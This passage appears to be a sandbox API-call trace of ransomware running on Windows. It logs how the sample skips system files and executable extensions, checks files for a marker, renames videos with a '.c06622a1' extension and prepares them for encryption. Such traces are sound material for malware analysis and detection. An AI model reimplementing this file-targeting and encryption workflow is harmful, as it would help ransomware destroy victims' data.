ftCreationTime.dwLowDateTime=0x44fc2f40, ftCreationTime.dwHighDateTime=0x1d5e506, ftLastAccessTime.dwLowDateTime=0x89254460, ftLastAccessTime.dwHighDateTime=0x1d5dd2f, ftLastWriteTime.dwLowDateTime=0x89254460, ftLastWriteTime.dwHighDateTime=0x1d5dd2f, nFileSizeHigh=0x0, nFileSizeLow=0x126dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="ip6-rAwrYeHBxC7.mkv", cAlternateFileName="IP6-RA~1.MKV")) returned 1 [0168.285] _wcsicmp (_Str1="ip6-rAwrYeHBxC7.mkv", _Str2="README.c06622a1.TXT") returned -9 [0168.285] wcsstr (_Str="ip6-rAwrYeHBxC7.mkv", _SubStr="README") returned 0x0 [0168.285] _wcsicmp (_Str1="autorun.inf", _Str2="ip6-rAwrYeHBxC7.mkv") returned -8 [0168.285] wcslen (_String="autorun.inf") returned 0xb [0168.285] _wcsicmp (_Str1="boot.ini", _Str2="ip6-rAwrYeHBxC7.mkv") returned -7 [0168.285] wcslen (_String="boot.ini") returned 0x8 [0168.285] _wcsicmp (_Str1="bootfont.bin", _Str2="ip6-rAwrYeHBxC7.mkv") returned -7 [0168.285] wcslen (_String="bootfont.bin") returned 0xc [0168.285] _wcsicmp (_Str1="bootsect.bak", _Str2="ip6-rAwrYeHBxC7.mkv") returned -7 [0168.285] wcslen (_String="bootsect.bak") returned 0xc [0168.285] _wcsicmp (_Str1="desktop.ini", _Str2="ip6-rAwrYeHBxC7.mkv") returned -5 [0168.285] wcslen (_String="desktop.ini") returned 0xb [0168.285] _wcsicmp (_Str1="iconcache.db", _Str2="ip6-rAwrYeHBxC7.mkv") returned -13 [0168.285] wcslen (_String="iconcache.db") returned 0xc [0168.285] _wcsicmp (_Str1="ntldr", _Str2="ip6-rAwrYeHBxC7.mkv") returned 5 [0168.285] wcslen (_String="ntldr") returned 0x5 [0168.285] _wcsicmp (_Str1="ntuser.dat", _Str2="ip6-rAwrYeHBxC7.mkv") returned 5 [0168.285] wcslen (_String="ntuser.dat") returned 0xa [0168.285] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ip6-rAwrYeHBxC7.mkv") returned 5 [0168.285] wcslen (_String="ntuser.dat.log") returned 0xe [0168.286] _wcsicmp (_Str1="ntuser.ini", _Str2="ip6-rAwrYeHBxC7.mkv") returned 5 [0168.286] wcslen (_String="ntuser.ini") returned 0xa [0168.286] _wcsicmp (_Str1="thumbs.db", _Str2="ip6-rAwrYeHBxC7.mkv") returned 11 [0168.286] wcslen (_String="thumbs.db") returned 0x9 [0168.286] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0168.286] wcslen (_String="386") returned 0x3 [0168.286] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0168.286] wcslen (_String="adv") returned 0x3 [0168.286] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0168.286] wcslen (_String="ani") returned 0x3 [0168.286] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0168.286] wcslen (_String="bat") returned 0x3 [0168.286] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0168.286] wcslen (_String="bin") returned 0x3 [0168.286] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0168.286] wcslen (_String="cab") returned 0x3 [0168.286] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0168.286] wcslen (_String="cmd") returned 0x3 [0168.286] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0168.286] wcslen (_String="com") returned 0x3 [0168.286] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0168.286] wcslen (_String="cpl") returned 0x3 [0168.286] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0168.286] wcslen (_String="cur") returned 0x3 [0168.286] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0168.286] wcslen (_String="deskthemepack") returned 0xd [0168.286] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0168.286] wcslen (_String="diagcab") returned 0x7 [0168.286] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0168.286] wcslen (_String="diagcfg") returned 0x7 [0168.286] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0168.286] wcslen (_String="diagpkg") returned 0x7 [0168.286] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0168.286] wcslen (_String="dll") returned 0x3 [0168.286] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0168.286] wcslen (_String="drv") returned 0x3 [0168.287] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0168.287] wcslen (_String="exe") returned 0x3 [0168.287] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0168.287] wcslen (_String="hlp") returned 0x3 [0168.287] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0168.287] wcslen (_String="icl") returned 0x3 [0168.287] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0168.287] wcslen (_String="icns") returned 0x4 [0168.287] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0168.287] wcslen (_String="ico") returned 0x3 [0168.287] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0168.287] wcslen (_String="ics") returned 0x3 [0168.287] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0168.287] wcslen (_String="idx") returned 0x3 [0168.287] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0168.287] wcslen (_String="ldf") returned 0x3 [0168.287] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0168.287] wcslen (_String="lnk") returned 0x3 [0168.287] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0168.287] wcslen (_String="mod") returned 0x3 [0168.287] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0168.287] wcslen (_String="mpa") returned 0x3 [0168.287] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0168.287] wcslen (_String="msc") returned 0x3 [0168.287] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0168.287] wcslen (_String="msp") returned 0x3 [0168.287] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0168.287] wcslen (_String="msstyles") returned 0x8 [0168.287] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0168.287] wcslen (_String="msu") returned 0x3 [0168.287] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0168.287] wcslen (_String="nls") returned 0x3 [0168.287] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0168.287] wcslen (_String="nomedia") returned 0x7 [0168.287] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0168.287] wcslen (_String="ocx") returned 0x3 [0168.288] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0168.288] wcslen (_String="prf") returned 0x3 [0168.288] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0168.288] wcslen (_String="ps1") returned 0x3 [0168.288] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0168.288] wcslen (_String="rom") returned 0x3 [0168.288] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0168.288] wcslen (_String="rtp") returned 0x3 [0168.288] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0168.288] wcslen (_String="scr") returned 0x3 [0168.288] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0168.288] wcslen (_String="shs") returned 0x3 [0168.288] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0168.288] wcslen (_String="spl") returned 0x3 [0168.288] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0168.288] wcslen (_String="sys") returned 0x3 [0168.288] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0168.288] wcslen (_String="theme") returned 0x5 [0168.288] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0168.288] wcslen (_String="themepack") returned 0x9 [0168.288] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0168.288] wcslen (_String="wpx") returned 0x3 [0168.288] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0168.288] wcslen (_String="lock") returned 0x4 [0168.288] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0168.288] wcslen (_String="key") returned 0x3 [0168.288] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0168.288] wcslen (_String="hta") returned 0x3 [0168.288] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0168.288] wcslen (_String="msi") returned 0x3 [0168.288] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0168.288] wcslen (_String="pdb") returned 0x3 [0168.288] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0168.289] wcslen (_String="sqlite") returned 0x6 [0168.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.289] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.289] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.289] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned 0x38 [0168.289] wcscpy (in: _Dest=0x32400d2, _Source="ip6-rAwrYeHBxC7.mkv" | out: _Dest="ip6-rAwrYeHBxC7.mkv") returned="ip6-rAwrYeHBxC7.mkv" [0168.289] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\ip6-rAwrYeHBxC7.mkv", dwFileAttributes=0x80) returned 1 [0168.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\ip6-rAwrYeHBxC7.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\ip6-rawryehbxc7.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0168.289] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.290] ReadFile (in: hFile=0x1ec, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.290] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xc815d1ff [0168.290] RtlComputeCrc32 (PartialCrc=0xd1ff, Buffer=0x32e9a4, Length=0x80) returned 0x368e2537 [0168.290] RtlComputeCrc32 (PartialCrc=0x2537, Buffer=0x32e9a4, Length=0x80) returned 0xe716ecef [0168.290] RtlComputeCrc32 (PartialCrc=0xecef, Buffer=0x32e9a4, Length=0x80) returned 0xc3d8da14 [0168.290] RtlComputeCrc32 (PartialCrc=0xda14, Buffer=0x32e9a4, Length=0x80) returned 0x3218270c [0168.290] CloseHandle (hObject=0x1ec) returned 1 [0168.290] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.290] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\ip6-rAwrYeHBxC7.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\ip6-rAwrYeHBxC7.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\ip6-rAwrYeHBxC7.mkv" [0168.291] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\ip6-rAwrYeHBxC7.mkv") returned 0x4c [0168.291] wcscpy (in: _Dest=0x3250100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.291] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\ip6-rAwrYeHBxC7.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\ip6-rawryehbxc7.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\ip6-rAwrYeHBxC7.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\ip6-rawryehbxc7.mkv.c06622a1"), dwFlags=0x8) returned 1 [0168.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\ip6-rAwrYeHBxC7.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\ip6-rawryehbxc7.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ec [0168.293] CreateIoCompletionPort (FileHandle=0x1ec, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.293] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3830020 [0168.300] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1e5fea28 [0168.300] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x499c29a0 [0168.300] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5d2056f0 [0168.300] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1303df1b [0168.300] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x66f89ce2 [0168.300] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x47a3b4fb [0168.300] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1968a9f8 [0168.300] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x18c81911 [0168.303] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3830094, Length=0x80) returned 0x3c344a47 [0168.303] RtlComputeCrc32 (PartialCrc=0x4a47, Buffer=0x3830094, Length=0x80) returned 0x15edc053 [0168.303] RtlComputeCrc32 (PartialCrc=0xc053, Buffer=0x3830094, Length=0x80) returned 0xe5337c81 [0168.303] RtlComputeCrc32 (PartialCrc=0x7c81, Buffer=0x3830094, Length=0x80) returned 0x6fd15e5e [0168.303] RtlComputeCrc32 (PartialCrc=0x5e5e, Buffer=0x3830094, Length=0x80) returned 0x2353d222 [0168.303] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3830020) returned 1 [0168.303] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.303] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.303] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb76517d0, ftCreationTime.dwHighDateTime=0x1d5dde6, ftLastAccessTime.dwLowDateTime=0x9c4645d0, ftLastAccessTime.dwHighDateTime=0x1d5df4b, ftLastWriteTime.dwLowDateTime=0x9c4645d0, ftLastWriteTime.dwHighDateTime=0x1d5df4b, nFileSizeHigh=0x0, nFileSizeLow=0x41cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="KgbIoZ i.mp4", cAlternateFileName="KGBIOZ~1.MP4")) returned 1 [0168.303] _wcsicmp (_Str1="KgbIoZ i.mp4", _Str2="README.c06622a1.TXT") returned -7 [0168.303] wcsstr (_Str="KgbIoZ i.mp4", _SubStr="README") returned 0x0 [0168.303] _wcsicmp (_Str1="autorun.inf", _Str2="KgbIoZ i.mp4") returned -10 [0168.303] wcslen (_String="autorun.inf") returned 0xb [0168.303] _wcsicmp (_Str1="boot.ini", _Str2="KgbIoZ i.mp4") returned -9 [0168.303] wcslen (_String="boot.ini") returned 0x8 [0168.303] _wcsicmp (_Str1="bootfont.bin", _Str2="KgbIoZ i.mp4") returned -9 [0168.303] wcslen (_String="bootfont.bin") returned 0xc [0168.303] _wcsicmp (_Str1="bootsect.bak", _Str2="KgbIoZ i.mp4") returned -9 [0168.303] wcslen (_String="bootsect.bak") returned 0xc [0168.303] _wcsicmp (_Str1="desktop.ini", _Str2="KgbIoZ i.mp4") returned -7 [0168.303] wcslen (_String="desktop.ini") returned 0xb [0168.304] _wcsicmp (_Str1="iconcache.db", _Str2="KgbIoZ i.mp4") returned -2 [0168.304] wcslen (_String="iconcache.db") returned 0xc [0168.304] _wcsicmp (_Str1="ntldr", _Str2="KgbIoZ i.mp4") returned 3 [0168.304] wcslen (_String="ntldr") returned 0x5 [0168.304] _wcsicmp (_Str1="ntuser.dat", _Str2="KgbIoZ i.mp4") returned 3 [0168.304] wcslen (_String="ntuser.dat") returned 0xa [0168.304] _wcsicmp (_Str1="ntuser.dat.log", _Str2="KgbIoZ i.mp4") returned 3 [0168.304] wcslen (_String="ntuser.dat.log") returned 0xe [0168.304] _wcsicmp (_Str1="ntuser.ini", _Str2="KgbIoZ i.mp4") returned 3 [0168.304] wcslen (_String="ntuser.ini") returned 0xa [0168.304] _wcsicmp (_Str1="thumbs.db", _Str2="KgbIoZ i.mp4") returned 9 [0168.304] wcslen (_String="thumbs.db") returned 0x9 [0168.304] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0168.304] wcslen (_String="386") returned 0x3 [0168.304] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0168.304] wcslen (_String="adv") returned 0x3 [0168.304] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0168.304] wcslen (_String="ani") returned 0x3 [0168.304] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0168.304] wcslen (_String="bat") returned 0x3 [0168.304] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0168.304] wcslen (_String="bin") returned 0x3 [0168.304] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0168.304] wcslen (_String="cab") returned 0x3 [0168.304] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0168.304] wcslen (_String="cmd") returned 0x3 [0168.304] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0168.304] wcslen (_String="com") returned 0x3 [0168.304] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0168.304] wcslen (_String="cpl") returned 0x3 [0168.304] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0168.304] wcslen (_String="cur") returned 0x3 [0168.304] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0168.304] wcslen (_String="deskthemepack") returned 0xd [0168.304] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0168.305] wcslen (_String="diagcab") returned 0x7 [0168.305] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0168.305] wcslen (_String="diagcfg") returned 0x7 [0168.305] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0168.305] wcslen (_String="diagpkg") returned 0x7 [0168.305] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0168.305] wcslen (_String="dll") returned 0x3 [0168.305] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0168.305] wcslen (_String="drv") returned 0x3 [0168.305] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0168.305] wcslen (_String="exe") returned 0x3 [0168.305] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0168.305] wcslen (_String="hlp") returned 0x3 [0168.305] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0168.305] wcslen (_String="icl") returned 0x3 [0168.305] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0168.305] wcslen (_String="icns") returned 0x4 [0168.305] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0168.305] wcslen (_String="ico") returned 0x3 [0168.305] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0168.305] wcslen (_String="ics") returned 0x3 [0168.305] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0168.305] wcslen (_String="idx") returned 0x3 [0168.305] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0168.305] wcslen (_String="ldf") returned 0x3 [0168.305] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0168.305] wcslen (_String="lnk") returned 0x3 [0168.305] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0168.305] wcslen (_String="mod") returned 0x3 [0168.305] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0168.305] wcslen (_String="mpa") returned 0x3 [0168.305] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0168.305] wcslen (_String="msc") returned 0x3 [0168.305] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0168.305] wcslen (_String="msp") returned 0x3 [0168.305] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0168.305] wcslen (_String="msstyles") returned 0x8 [0168.305] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0168.306] wcslen (_String="msu") returned 0x3 [0168.306] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0168.306] wcslen (_String="nls") returned 0x3 [0168.306] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0168.306] wcslen (_String="nomedia") returned 0x7 [0168.306] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0168.306] wcslen (_String="ocx") returned 0x3 [0168.306] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0168.306] wcslen (_String="prf") returned 0x3 [0168.306] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0168.306] wcslen (_String="ps1") returned 0x3 [0168.306] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0168.306] wcslen (_String="rom") returned 0x3 [0168.306] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0168.306] wcslen (_String="rtp") returned 0x3 [0168.306] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0168.306] wcslen (_String="scr") returned 0x3 [0168.306] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0168.306] wcslen (_String="shs") returned 0x3 [0168.306] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0168.306] wcslen (_String="spl") returned 0x3 [0168.306] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0168.306] wcslen (_String="sys") returned 0x3 [0168.306] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0168.306] wcslen (_String="theme") returned 0x5 [0168.306] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0168.306] wcslen (_String="themepack") returned 0x9 [0168.306] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0168.306] wcslen (_String="wpx") returned 0x3 [0168.306] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0168.306] wcslen (_String="lock") returned 0x4 [0168.306] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0168.306] wcslen (_String="key") returned 0x3 [0168.306] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0168.306] wcslen (_String="hta") returned 0x3 [0168.306] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0168.306] wcslen (_String="msi") returned 0x3 [0168.307] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0168.307] wcslen (_String="pdb") returned 0x3 [0168.307] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0168.307] wcslen (_String="sqlite") returned 0x6 [0168.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.307] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.307] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.307] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned 0x38 [0168.307] wcscpy (in: _Dest=0x32400d2, _Source="KgbIoZ i.mp4" | out: _Dest="KgbIoZ i.mp4") returned="KgbIoZ i.mp4" [0168.307] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\KgbIoZ i.mp4", dwFileAttributes=0x80) returned 1 [0168.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\KgbIoZ i.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\kgbioz i.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0168.307] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.307] ReadFile (in: hFile=0x1a0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.308] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xe46aa39f [0168.308] RtlComputeCrc32 (PartialCrc=0xa39f, Buffer=0x32e9a4, Length=0x80) returned 0x32858ac3 [0168.308] RtlComputeCrc32 (PartialCrc=0x8ac3, Buffer=0x32e9a4, Length=0x80) returned 0x74b8a66a [0168.308] RtlComputeCrc32 (PartialCrc=0xa66a, Buffer=0x32e9a4, Length=0x80) returned 0x1aa29c7f [0168.308] RtlComputeCrc32 (PartialCrc=0x9c7f, Buffer=0x32e9a4, Length=0x80) returned 0xc0ba6250 [0168.308] CloseHandle (hObject=0x1a0) returned 1 [0168.308] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.308] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\KgbIoZ i.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\KgbIoZ i.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\KgbIoZ i.mp4" [0168.308] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\KgbIoZ i.mp4") returned 0x45 [0168.308] wcscpy (in: _Dest=0x32500f2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.309] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\KgbIoZ i.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\kgbioz i.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\KgbIoZ i.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\kgbioz i.mp4.c06622a1"), dwFlags=0x8) returned 1 [0168.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\KgbIoZ i.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\kgbioz i.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 